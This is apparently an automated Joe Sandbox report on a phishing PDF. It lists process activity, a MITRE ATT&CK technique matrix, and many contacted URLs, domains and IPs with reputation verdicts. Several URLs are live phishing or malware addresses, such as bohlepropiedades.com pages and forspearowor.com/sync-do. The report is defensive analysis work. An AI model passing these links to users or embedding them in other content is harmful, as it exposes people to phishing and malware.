Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: AZfDGVWF68.pdfInitial sample: PDF keyword /JS count = 0
Source: AZfDGVWF68.pdfInitial sample: PDF keyword /JavaScript count = 0
Source: AZfDGVWF68.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential Dumping1
System Information Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
AZfDGVWF68.pdf5%ReversingLabsDocument-PDF.Phishing.Generic
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://wungoangeredsa.com/_next/static/chunks/621e8925e817e462-1736072686539.fe6846fd6e13d76b.js0%Avira URL Cloudsafe
https://bohlepropiedades.com/100%Avira URL Cloudphishing
https://wungoangeredsa.com/_next/static/3ufPxZgwc9gMArDis_san/_ssgManifest.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/ac5595402e335eea-1736072686539.3cfdc57f0372e5e9.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/27da6a71c55717fa-1736072686539.1f230f14e978af7b.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/d6be0b89fa7aeaa3-1736072686539.cf6cc9096c69f504.js0%Avira URL Cloudsafe
https://www.terrificstrands.digital/click?offer_id=31275&pub_id=173475&pub_sub_sub_id=9&unique1=5879905-0031c&app=opt&app_store_id=ncd&pub_click_id={External_ID_from_traffic_source}&site={subID}&pub_sub_id={sub_subID}0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/media/icon-survey.86b78ce0.svg0%Avira URL Cloudsafe
https://bohlepropiedades.com/favicon.ico100%Avira URL Cloudphishing
https://wungoangeredsa.com/_next/static/chunks/f11a4c032471831f-1736072686539-df6b842f2183863b.js0%Avira URL Cloudsafe
https://azz.underbellymeet.asia/?utm_term=7456757949717807127&tid=57696e33320%Avira URL Cloudsafe
https://wungoangeredsa.com/finance-survey/272/?svar=1736161758&ssk=7cd32637808ffb7eb68676c4facb26c7&ssk2=6eef4467b47effe6659448a630f4cafb&s=900090192959910233&var=615-538bd0d9&ymid=2de718&z=8645117&var_3=M7456757949717807127&rdk=rk30%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/d7be7898798e9f10-1736072686539.f4d9d083e15d3eef.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/3cacc58ea516fe6f-1736072686539.4d666b3ce7dcd66f.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/81cd5f76d0de6e9e-1736072686539-dd624469daa80f67.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/dc0be3deba0a9b89-1736072686539.5b2e1a67b76350ce.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/4d859cac5ba89327-1736072686539-7c9f685438bac6d8.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/media/m_13.99d105c0.webp0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/b88eab57f2676fbf-1736072686539.7179d464977285be.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/1c02c3e681ea9f6d-1736072686539-ebf163de3da5e125.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/20a35a44b4f8b20a-1736072686539.c29d864a1f4963e0.js0%Avira URL Cloudsafe
https://feed.chimukappa.com/e.php?m=0%Avira URL Cloudsafe
https://bohlepropiedades.com/includes/contact.php100%Avira URL Cloudphishing
https://wungoangeredsa.com/_next/static/chunks/a61972911ad09d00-1736072686539.d5eb9d66276548f8.js0%Avira URL Cloudsafe
https://azz.underbellymeet.asia/sw.js?v=17361617527220%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/4f5ddda985b24b74-1736072686539-595e9d9ff8fe596a.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/media/f_24.a0b04b39.webp0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/ffa1a9ad1af72fff-1736072686539.a773b898c1059c87.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/favicon.ico0%Avira URL Cloudsafe
https://bohlepropiedades.com/includes/sse.php100%Avira URL Cloudphishing
https://wungoangeredsa.com/_next/static/chunks/edad189aa37887a4-1736072686539.43e4db17fc3b4987.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/1fd69c98394a3b87-1736072686539.8146f5f4d16f0056.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/f23d1daac59993b6-1736072686539.c517d511b765818c.js0%Avira URL Cloudsafe
https://www.umbrellaland.fit/?sl=5879905-0031c&pub_click_id=0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/9d01a94e442e71b2-1736072686539.1f0bd67ad15ff842.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/media/comments-empty-user.c37f32b6.webp0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/b79dd0dbaf68b5b4-1736072686539.3b548827f7eb8d6d.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/media/m_28.094ddc20.webp0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/dbb80ba394719d25-1736072686539.0157f5525bb5ad80.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/ae2aa467dd9af961-1736072686539.fa66633a9d1758bd.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/e349ffdbb65d6c93-1736072686539-660e5b7e2e3b7996.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/946b720792ec3642-1736072686539.5fb83dbc00ce11a5.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/3ufPxZgwc9gMArDis_san/_buildManifest.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/265d60a91fd3d6b8-1736072686539.748820502fe4525b.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/cce078a36fb49fc2-1736072686539.a4de873c342c784d.js0%Avira URL Cloudsafe
https://bohlepropiedades.com/includes/assets/index-qoqlwAed.js100%Avira URL Cloudphishing
https://wungoangeredsa.com/_next/static/chunks/40ab15743262ea54-1736072686539.eaaf74440aba84a2.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/87040b3d41357533-1736072686539.6a095265338b008b.js0%Avira URL Cloudsafe
https://www.umbrellaland.fit/?sl=5879905-0031c&pub_click_id={External_ID_from_traffic_source}&site={subID}&pub_sub_id={sub_subID}&eyeg=945fb352f49cc318c0f7cbe195bc5eb5&eyer=0.4049684939698268&eyei=0&eyew=1280&eyeh=907&eyetd=210&eyef=bohlepropiedades.com0%Avira URL Cloudsafe
https://juvuthoors.com/nwtrck?var_3=M7456757949717807127&ymid=2de718&var=615-538bd0d9&z=86451170%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/css/0bc0cde260d08b97.css0%Avira URL Cloudsafe
https://bohlepropiedades.com/includes/3z6r2I6C42020J100%Avira URL Cloudphishing
https://www.umbrellaland.fit/?sl=5879905-0031c&pub_click_id={External_ID_from_traffic_source}&site={subID}&pub_sub_id={sub_subID}0%Avira URL Cloudsafe
https://wungoangeredsa.com/sync-metrics0%Avira URL Cloudsafe
https://azz.underbellymeet.asia/?1=173475&utm_medium=7db74e7d269c2b1f030ec267c5b1a290488100f6&utm_campaign=maap24&cid=Bi0jftMAAAGUO0315QAAeisAAqWjAAAAAAAAAAAUAAABN2Y0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/2d343433e1c8b3ac-1736072686539.2dbd5874240e877f.js0%Avira URL Cloudsafe
https://azz.underbellymeet.asia/favicon.ico0%Avira URL Cloudsafe
https://feed.chimukappa.com/feed.php?v=1731923398&ep=0%Avira URL Cloudsafe
https://wungoangeredsa.com/rotate?var=8645117&ymid=615-538bd0d9&click_id=900090192959910233&rhd=1&var_3=M7456757949717807127&oaid=1zy28050kovbfyyc4yz4gsq62pkmaxhb&os_version=10.0.0&btz=America%2FNew_York&bto=300&zz=4292526%3B5128285%3B4326653%3B4949467%3B5381235%3B8372416%3B5381316%3B8372719%3B5381307&uid=1zy28050kovbfyyc4yz4gsq62pkmaxhb0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/593553c1eec4cbba-1736072686539.97c2038dc0b2daf0.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/c2f96434bddabe6e-1736072686539.3a22e244b1dff92a.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/778e9b206de35143-1736072686539.bfe7610401739abb.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/8d3443188ef1fee1-1736072686539.437b26541c6a284a.js0%Avira URL Cloudsafe
https://wungoangeredsa.com/_next/static/chunks/55b75effc428db6e-1736072686539.cbe69f590e8fc565.js0%Avira URL Cloudsafe
https://bohlepropiedades.com/includes/assets/index-B_awNbnU.css100%Avira URL Cloudphishing
https://wungoangeredsa.com/_next/static/media/m_20.62b047c4.webp0%Avira URL Cloudsafe
https://forspearowor.com/sync-do100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
browser.sentry-cdn.com
151.101.130.217
truefalse
    high
    umbrellaland.fit
    51.68.82.147
    truetrue
      unknown
      datatechonert.com
      185.49.145.45
      truefalse
        high
        juvuthoors.com
        104.18.3.4
        truefalse
          unknown
          my.rtmark.net
          188.114.97.3
          truefalse
            high
            bg.microsoft.map.fastly.net
            199.232.210.172
            truefalse
              high
              www.terrificstrands.digital
              188.114.96.3
              truefalse
                unknown
                cdntechone.com
                188.114.97.3
                truefalse
                  high
                  bohlepropiedades.com
                  162.214.122.223
                  truefalse
                    unknown
                    www.google.com
                    142.250.185.68
                    truefalse
                      high
                      azz.underbellymeet.asia
                      67.212.184.148
                      truetrue
                        unknown
                        wungoangeredsa.com
                        104.18.2.4
                        truetrue
                          unknown
                          forspearowor.com
                          104.18.3.4
                          truefalse
                            unknown
                            datatechone.com
                            37.48.68.71
                            truefalse
                              high
                              imagizer.imageshack.com
                              unknown
                              unknownfalse
                                high
                                x1.i.lencr.org
                                unknown
                                unknownfalse
                                  high
                                  www.umbrellaland.fit
                                  unknown
                                  unknowntrue
                                    unknown
                                    NameMaliciousAntivirus DetectionReputation
                                    https://bohlepropiedades.com/M3o2cjJJNkM0MjAyMEo=false
                                      unknown
                                      https://wungoangeredsa.com/_next/static/chunks/27da6a71c55717fa-1736072686539.1f230f14e978af7b.jsfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://wungoangeredsa.com/_next/static/chunks/ac5595402e335eea-1736072686539.3cfdc57f0372e5e9.jsfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.terrificstrands.digital/click?offer_id=31275&pub_id=173475&pub_sub_sub_id=9&unique1=5879905-0031c&app=opt&app_store_id=ncd&pub_click_id={External_ID_from_traffic_source}&site={subID}&pub_sub_id={sub_subID}false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://wungoangeredsa.com/_next/static/chunks/d6be0b89fa7aeaa3-1736072686539.cf6cc9096c69f504.jsfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://my.rtmark.net/gid.js?userId=1zy28050kovbfyyc4yz4gsq62pkmaxhbfalse
                                        high
                                        https://wungoangeredsa.com/_next/static/chunks/621e8925e817e462-1736072686539.fe6846fd6e13d76b.jsfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://wungoangeredsa.com/_next/static/media/icon-survey.86b78ce0.svgfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://wungoangeredsa.com/_next/static/chunks/f11a4c032471831f-1736072686539-df6b842f2183863b.jsfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://wungoangeredsa.com/_next/static/3ufPxZgwc9gMArDis_san/_ssgManifest.jsfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://bohlepropiedades.com/favicon.icofalse
                                        • Avira URL Cloud: phishing
                                        unknown
                                        https://azz.underbellymeet.asia/?utm_term=7456757949717807127&tid=57696e3332false
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://wungoangeredsa.com/_next/static/chunks/d7be7898798e9f10-1736072686539.f4d9d083e15d3eef.jsfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://wungoangeredsa.com/finance-survey/272/?svar=1736161758&ssk=7cd32637808ffb7eb68676c4facb26c7&ssk2=6eef4467b47effe6659448a630f4cafb&s=900090192959910233&var=615-538bd0d9&ymid=2de718&z=8645117&var_3=M7456757949717807127&rdk=rk3false
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://wungoangeredsa.com/_next/static/chunks/b88eab57f2676fbf-1736072686539.7179d464977285be.jsfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://wungoangeredsa.com/_next/static/chunks/1c02c3e681ea9f6d-1736072686539-ebf163de3da5e125.jsfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://wungoangeredsa.com/_next/static/chunks/81cd5f76d0de6e9e-1736072686539-dd624469daa80f67.jsfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://wungoangeredsa.com/_next/static/chunks/3cacc58ea516fe6f-1736072686539.4d666b3ce7dcd66f.jsfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://wungoangeredsa.com/_next/static/chunks/4d859cac5ba89327-1736072686539-7c9f685438bac6d8.jsfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://cdntechone.com/stattag.jsfalse
                                          high
                                          https://wungoangeredsa.com/_next/static/media/m_13.99d105c0.webpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://wungoangeredsa.com/_next/static/chunks/dc0be3deba0a9b89-1736072686539.5b2e1a67b76350ce.jsfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://azz.underbellymeet.asia/?utm_term=7456757949717807127&tid=57696e3332#0false
                                            unknown
                                            https://azz.underbellymeet.asia/sw.js?v=1736161752722false
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://wungoangeredsa.com/_next/static/chunks/20a35a44b4f8b20a-1736072686539.c29d864a1f4963e0.jsfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://wungoangeredsa.com/_next/static/chunks/a61972911ad09d00-1736072686539.d5eb9d66276548f8.jsfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://bohlepropiedades.com/includes/contact.phpfalse
                                            • Avira URL Cloud: phishing
                                            unknown
                                            https://wungoangeredsa.com/_next/static/chunks/4f5ddda985b24b74-1736072686539-595e9d9ff8fe596a.jsfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://wungoangeredsa.com/_next/static/media/f_24.a0b04b39.webpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://wungoangeredsa.com/_next/static/chunks/ffa1a9ad1af72fff-1736072686539.a773b898c1059c87.jsfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://wungoangeredsa.com/favicon.icofalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://bohlepropiedades.com/includes/sse.phpfalse
                                            • Avira URL Cloud: phishing
                                            unknown
                                            https://wungoangeredsa.com/_next/static/chunks/1fd69c98394a3b87-1736072686539.8146f5f4d16f0056.jsfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://wungoangeredsa.com/_next/static/chunks/edad189aa37887a4-1736072686539.43e4db17fc3b4987.jsfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://wungoangeredsa.com/_next/static/chunks/f23d1daac59993b6-1736072686539.c517d511b765818c.jsfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://wungoangeredsa.com/_next/static/chunks/9d01a94e442e71b2-1736072686539.1f0bd67ad15ff842.jsfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://wungoangeredsa.com/_next/static/media/comments-empty-user.c37f32b6.webpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://wungoangeredsa.com/_next/static/chunks/dbb80ba394719d25-1736072686539.0157f5525bb5ad80.jsfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://wungoangeredsa.com/_next/static/media/m_28.094ddc20.webpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://wungoangeredsa.com/_next/static/chunks/b79dd0dbaf68b5b4-1736072686539.3b548827f7eb8d6d.jsfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://wungoangeredsa.com/_next/static/chunks/ae2aa467dd9af961-1736072686539.fa66633a9d1758bd.jsfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://datatechonert.com/log/add?cid=eacf36da-c06d-4d71-90cc-88e30cd4240a&ruid=6ccfebb8-c732-490f-a46c-39244b55a680false
                                              high
                                              https://wungoangeredsa.com/_next/static/chunks/e349ffdbb65d6c93-1736072686539-660e5b7e2e3b7996.jsfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://wungoangeredsa.com/_next/static/3ufPxZgwc9gMArDis_san/_buildManifest.jsfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://wungoangeredsa.com/_next/static/chunks/946b720792ec3642-1736072686539.5fb83dbc00ce11a5.jsfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://wungoangeredsa.com/_next/static/chunks/265d60a91fd3d6b8-1736072686539.748820502fe4525b.jsfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://wungoangeredsa.com/finance-survey/272?svar=1736161758&ssk=7cd32637808ffb7eb68676c4facb26c7&ssk2=6eef4467b47effe6659448a630f4cafb&s=900090192959910233&var=615-538bd0d9&ymid=2de718&z=8645117&var_3=M7456757949717807127&rdk=rk3false
                                                unknown
                                                https://wungoangeredsa.com/_next/static/chunks/cce078a36fb49fc2-1736072686539.a4de873c342c784d.jsfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://bohlepropiedades.com/includes/assets/index-qoqlwAed.jsfalse
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://wungoangeredsa.com/_next/static/chunks/40ab15743262ea54-1736072686539.eaaf74440aba84a2.jsfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://wungoangeredsa.com/_next/static/chunks/87040b3d41357533-1736072686539.6a095265338b008b.jsfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.umbrellaland.fit/?sl=5879905-0031c&pub_click_id={External_ID_from_traffic_source}&site={subID}&pub_sub_id={sub_subID}&eyeg=945fb352f49cc318c0f7cbe195bc5eb5&eyer=0.4049684939698268&eyei=0&eyew=1280&eyeh=907&eyetd=210&eyef=bohlepropiedades.comfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://juvuthoors.com/nwtrck?var_3=M7456757949717807127&ymid=2de718&var=615-538bd0d9&z=8645117false
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://bohlepropiedades.com/includes/3z6r2I6C42020Jfalse
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://wungoangeredsa.com/_next/static/css/0bc0cde260d08b97.cssfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.umbrellaland.fit/?sl=5879905-0031c&pub_click_id={External_ID_from_traffic_source}&site={subID}&pub_sub_id={sub_subID}false
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://wungoangeredsa.com/sync-metricsfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://azz.underbellymeet.asia/?1=173475&utm_medium=7db74e7d269c2b1f030ec267c5b1a290488100f6&utm_campaign=maap24&cid=Bi0jftMAAAGUO0315QAAeisAAqWjAAAAAAAAAAAUAAABN2Yfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://wungoangeredsa.com/_next/static/chunks/2d343433e1c8b3ac-1736072686539.2dbd5874240e877f.jsfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://azz.underbellymeet.asia/favicon.icofalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://wungoangeredsa.com/rotate?var=8645117&ymid=615-538bd0d9&click_id=900090192959910233&rhd=1&var_3=M7456757949717807127&oaid=1zy28050kovbfyyc4yz4gsq62pkmaxhb&os_version=10.0.0&btz=America%2FNew_York&bto=300&zz=4292526%3B5128285%3B4326653%3B4949467%3B5381235%3B8372416%3B5381316%3B8372719%3B5381307&uid=1zy28050kovbfyyc4yz4gsq62pkmaxhbfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://wungoangeredsa.com/_next/static/chunks/593553c1eec4cbba-1736072686539.97c2038dc0b2daf0.jsfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://wungoangeredsa.com/_next/static/chunks/8d3443188ef1fee1-1736072686539.437b26541c6a284a.jsfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://wungoangeredsa.com/_next/static/chunks/c2f96434bddabe6e-1736072686539.3a22e244b1dff92a.jsfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://wungoangeredsa.com/_next/static/chunks/778e9b206de35143-1736072686539.bfe7610401739abb.jsfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://wungoangeredsa.com/_next/static/chunks/55b75effc428db6e-1736072686539.cbe69f590e8fc565.jsfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://wungoangeredsa.com/_next/static/media/m_20.62b047c4.webpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://bohlepropiedades.com/includes/assets/index-B_awNbnU.cssfalse
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://forspearowor.com/sync-dofalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://bohlepropiedades.com/chromecache_291.10.drfalse
                                                • Avira URL Cloud: phishing
                                                unknown
                                                https://feed.chimukappa.com/e.php?m=chromecache_289.10.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://www.umbrellaland.fit/?sl=5879905-0031c&pub_click_id=chromecache_291.10.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.1.drfalse
                                                  high
                                                  https://feed.chimukappa.com/feed.php?v=1731923398&ep=chromecache_289.10.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  162.214.122.223
                                                  bohlepropiedades.comUnited States
                                                  46606UNIFIEDLAYER-AS-1USfalse
                                                  104.18.3.4
                                                  juvuthoors.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  151.101.130.217
                                                  browser.sentry-cdn.comUnited States
                                                  54113FASTLYUSfalse
                                                  104.18.2.4
                                                  wungoangeredsa.comUnited States
                                                  13335CLOUDFLARENETUStrue
                                                  67.212.184.148
                                                  azz.underbellymeet.asiaUnited States
                                                  32475SINGLEHOP-LLCUStrue
                                                  142.250.185.68
                                                  www.google.comUnited States
                                                  15169GOOGLEUSfalse
                                                  37.48.68.71
                                                  datatechone.comNetherlands
                                                  60781LEASEWEB-NL-AMS-01NetherlandsNLfalse
                                                  51.68.82.147
                                                  umbrellaland.fitFrance
                                                  16276OVHFRtrue
                                                  185.49.145.45
                                                  datatechonert.comNetherlands
                                                  35415WEBZILLANLfalse
                                                  239.255.255.250
                                                  unknownReserved
                                                  unknownunknownfalse
                                                  188.114.97.3
                                                  my.rtmark.netEuropean Union
                                                  13335CLOUDFLARENETUSfalse
                                                  188.114.96.3
                                                  www.terrificstrands.digitalEuropean Union
                                                  13335CLOUDFLARENETUSfalse
                                                  IP
                                                  192.168.2.4
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1584735
                                                  Start date and time:2025-01-06 12:05:32 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 5m 36s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:defaultwindowspdfcookbook.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:13
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:AZfDGVWF68.pdf
                                                  renamed because original name is a hash value
                                                  Original Sample Name:b24c416e0247cf131d4e8b634c712612bf35d0ee13fca05c62ff0534d273da28.pdf
                                                  Detection:MAL
                                                  Classification:mal56.winPDF@42/203@45/13
                                                  EGA Information:Failed
                                                  HCA Information:
                                                  • Successful, ratio: 100%
                                                  • Number of executed functions: 0
                                                  • Number of non-executed functions: 0
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .pdf
                                                  • Found PDF document
                                                  • Close Viewer
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 23.56.252.213, 2.16.168.105, 2.16.168.107, 54.224.241.105, 34.237.241.83, 50.16.47.176, 18.213.11.84, 172.64.41.3, 162.159.61.3, 23.209.209.135, 199.232.210.172, 192.229.221.95, 172.217.16.131, 142.250.186.46, 108.177.15.84, 142.250.74.206, 142.250.80.110, 74.125.0.102, 2.19.126.155, 2.19.126.136, 142.250.186.106, 142.250.186.74, 142.250.74.202, 142.250.185.74, 142.250.186.138, 142.250.185.170, 216.58.212.138, 142.250.185.202, 142.250.185.138, 172.217.16.202, 216.58.212.170, 142.250.184.234, 142.250.185.106, 142.250.186.42, 216.58.206.74, 172.217.18.10, 2.20.245.141, 2.20.245.134, 142.250.181.234, 172.217.16.138, 142.250.186.170, 142.250.184.202, 142.250.185.234, 216.58.206.42, 142.250.185.195, 142.250.185.110, 172.217.23.106, 23.56.254.164, 23.47.168.24, 172.202.163.200, 13.107.246.45
